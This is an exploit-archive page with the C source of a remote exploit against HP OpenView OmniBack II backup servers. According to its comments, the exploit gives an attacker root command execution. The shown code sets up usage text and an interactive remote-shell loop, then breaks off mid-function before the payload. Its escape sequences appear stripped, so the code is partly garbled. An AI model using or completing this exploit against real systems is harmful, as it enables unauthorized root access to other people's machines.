[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : HP OpenView OmniBack II Generic Remote Exploit
# Published : 2000-12-21
# Author : DiGiT
# Previous Title : Linux Kernel 2.2 (TCP/IP Weakness) Exploit
# Next Title : OpenBSD 2.6 / 2.7ftpd Remote Exploit
/ *
* HP OpenView OmniBack II generic remote Exploit by DiGiT - teddi@linux.is
*
* Omniback is a network backup system by HP, widely used.
* took me some time to figure out how omniback communicated then it was just
* a matter of finding a bug.
*
* This lovely little exploit will give you a remote "shell" of sorts, you
* can execute any command on the system.
*
* As far as I can tell this thing is vuln on every Omniback I have seen.
* I've tried HP-UX, Linux so far, with diff versions etc. It needs some change
* to work on windows, but should very extremly easy, be creative.
*
* Greets, #!security.is, #!ADM#$%$#, #hax & HP systems for this proggie ;>
*
* - DiGiT [digit@security.is]
*
* I'm releasing this because it leaked and kids got their hands on it ;<
* sorry.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/stat.h>
int sockfd;
struct hostent *host;
usage (char *progname)
{
printf ("nOmniback II *: remote exploit by DiGiT - teddi@linux.isn");
printf ("Gives possibility to execute any command on a remote system as root!nn");
printf ("Usage: %s hostname nn", progname);
exit (1);
}
int
shell()
{
fd_set fd_stat;
char recv[1024];
int n,i;
static char testcmd[256] = "/bin/uname -a ; id ;rn";
fprintf(stdout, "We have remote shell&%#$&%!n");
fprintf(stdout, "nType in any command and it will get executed.nHave fun... DiGiT - teddi@linux.isnnn");
write(sockfd, testcmd, strlen(testcmd));
while(1)
{
FD_ZERO(&fd_stat);
FD_SET(sockfd, &fd_stat);
FD_SET(0, &fd_stat);
select(sockfd+1, &fd_stat, NULL, NULL, NULL);
if (FD_ISSET(sockfd, &fd_stat))
{
if((n=read (sockfd,recv,sizeof(recv))) < 0)
{
printf("Connection has been closedn");
exit(0);
}
for(i = 0; i < n ; i++) {
if(recv[i] == ' 00') {
recv[i] = "";
}
}
recv[n] = 0;
recv[n-1] = 'n';
fprintf(stdout, "%sn", recv);
}
if (FD_ISSET(0, &fd_stat))
{
if((n=read(0, recv, sizeof(recv)))>0)
{
if(write(sockfd, recv,n) == -1)
{
printf("Error %$#n");
exit(0);
}
}
}
}
}
send_code ()
{
char path[32];
/* I dont care I just made test code and it worked, so #$%$# off */
write (sockfd, "